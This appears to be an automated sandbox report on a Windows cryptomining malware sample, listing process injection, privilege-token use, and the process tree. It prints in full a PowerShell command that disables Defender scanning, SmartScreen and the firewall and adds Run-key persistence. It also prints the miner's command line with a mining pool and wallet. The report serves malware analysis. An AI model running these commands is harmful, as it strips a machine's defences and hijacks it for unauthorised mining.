832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
788	powershell.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exeUpSys.exeUpSys.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	976	powershell.exe
Token: SeDebugPrivilege	1980	UpSys.exe
Token: SeAssignPrimaryTokenPrivilege	1980	UpSys.exe
Token: SeIncreaseQuotaPrivilege	1980	UpSys.exe
Token: 0	1980	UpSys.exe
Token: SeDebugPrivilege	1764	UpSys.exe
Token: SeAssignPrimaryTokenPrivilege	1764	UpSys.exe
Token: SeIncreaseQuotaPrivilege	1764	UpSys.exe
Token: SeDebugPrivilege	788	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exepowershell.exeUpSys.exe

description	pid	process	target process
PID 832 wrote to memory of 976	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	powershell.exe
PID 832 wrote to memory of 976	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	powershell.exe
PID 832 wrote to memory of 976	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	powershell.exe
PID 832 wrote to memory of 1196	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1196	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1196	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 976 wrote to memory of 1980	976	powershell.exe	UpSys.exe
PID 976 wrote to memory of 1980	976	powershell.exe	UpSys.exe
PID 976 wrote to memory of 1980	976	powershell.exe	UpSys.exe
PID 976 wrote to memory of 1552	976	powershell.exe	netsh.exe
PID 976 wrote to memory of 1552	976	powershell.exe	netsh.exe
PID 976 wrote to memory of 1552	976	powershell.exe	netsh.exe
PID 832 wrote to memory of 1500	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1500	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1500	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1540	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1540	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1540	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 1544 wrote to memory of 788	1544	UpSys.exe	powershell.exe
PID 1544 wrote to memory of 788	1544	UpSys.exe	powershell.exe
PID 1544 wrote to memory of 788	1544	UpSys.exe	powershell.exe
PID 832 wrote to memory of 1720	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1720	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1720	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1748	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1748	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1748	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 868	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 868	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 868	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 924	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 924	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 924	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1088	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1088	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1088	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1120	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1120	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1120	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1412	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1412	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1412	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1736	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1736	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1736	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1668	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1668	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1668	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1196	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1196	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1196	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1500	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1500	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1500	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1648	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1648	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1648	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 672	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 672	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 672	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1560	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1560	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1560	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe
PID 832 wrote to memory of 1668	832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe	Database.exe

C:\Users\Admin\AppData\Local\Temp\dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
"C:\Users\Admin\AppData\Local\Temp\dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe"
1⤵
- Checks BIOS information in registry
- Drops startup file
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
  2⤵
  - Modifies security service
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:976
- - C:\ProgramData\UpSys.exe
    "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
  - - C:\ProgramData\UpSys.exe
      "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1764
    - - C:\ProgramData\UpSys.exe
        
        "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        Suspicious use of WriteProcessMemory
        
        PID:1544
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        6⤵
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:788
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
    3⤵
    PID:1552
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1196
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1500
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1540
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1720
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1748
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:868
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:924
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1088
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1120
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1412
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1736
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1668
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1196
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1500
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1648
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:672
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1560
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1668
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1332
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1192
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1412
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:1632
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:1104
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:884
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:1000
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:1652
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:1972
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:1612
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:1204
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:1164
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:1624
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:1996
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  PID:836
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:2000
- C:\ProgramData\Systemd\Database.exe
  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:268
